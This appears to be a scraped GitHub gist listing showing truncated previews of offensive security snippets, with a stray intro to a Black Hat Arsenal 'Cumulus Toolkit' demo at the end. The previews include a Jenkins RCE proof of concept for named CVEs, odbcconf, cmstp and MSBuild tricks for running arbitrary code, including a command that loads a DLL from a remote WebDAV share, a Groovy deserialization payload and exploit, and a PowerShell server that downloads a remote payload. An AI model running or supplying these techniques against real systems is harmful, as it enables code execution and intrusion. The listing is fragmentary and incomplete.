Chris Gates carnal0wnage

akhil-reni / payload
Created Jul 26, 2019
Jenkins Metaprogramming RCE Create new user
View payload
adamyordan /
Last active Jul 29, 2019
# Author: Adam Jordan
# Date: 2019-02-15
# Repository:
# PoC for: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)
import argparse
import jenkins
View xsl-notepad.xml
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="" ?>
View cmstp.inf
;cmstp.exe /s cmstp.inf
Arno0x / odbcconf.cs
Created Nov 22, 2017
Download and execute arbitrary code with odbcconf.exe
View odbcconf.cs
To use with odbcconf.exe:
odbcconf /S /A {REGSVR odbcconf.dll}
or, from a remote location (if WebDAV support enabled):
odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll}
using System;
Arno0x / msbuild.xml
Created Nov 17, 2017
MSBuild project definition to execute arbitrary code from msbuild.exe
View msbuild.xml
<Project ToolsVersion="4.0" xmlns="">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml -->
<Target Name="Hello">
<SharpLauncher >
DiabloHorn /
Created Sep 9, 2017
Java class to generate a Groovy serialized payload
DiabloHorn -
For learning purposes we build the groovy payload ourselves instead of using
ysoserial. This helps us better understand the chain and the mechanisms
involved in exploiting this bug.
compile with:
javac -cp <path to groovy lib>
javac -cp DeserLab/DeserLab-v1.0/lib/groovy-all-2.3.9.jar
DiabloHorn /
Created Sep 9, 2017
Exploit for the DeserLab vulnerable implementation
#!/usr/bin/env python
DiabloHorn -
cobbr / server.ps1
Last active Oct 4, 2018 — forked from obscuresec/dirtywebserver.ps1
Dirty PowerShell Webserver
View server.ps1
$mk = (new-object net.webclient).downloadstring("")
$Hso = New-Object Net.HttpListener
While ($Hso.IsListening) {
$HC = $Hso.GetContext()
$HRes = $HC.Response
If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') {
$Buf = [Text.Encoding]::UTF8.GetBytes($mk)

Cumulus Toolkit Cliff Notes

By popular demand, here are my notes for running the demo I presented at Blackhat Arsenal 2017. These are not full instructions on how to set up the full environment; please let me know if you are interested in such a thing.

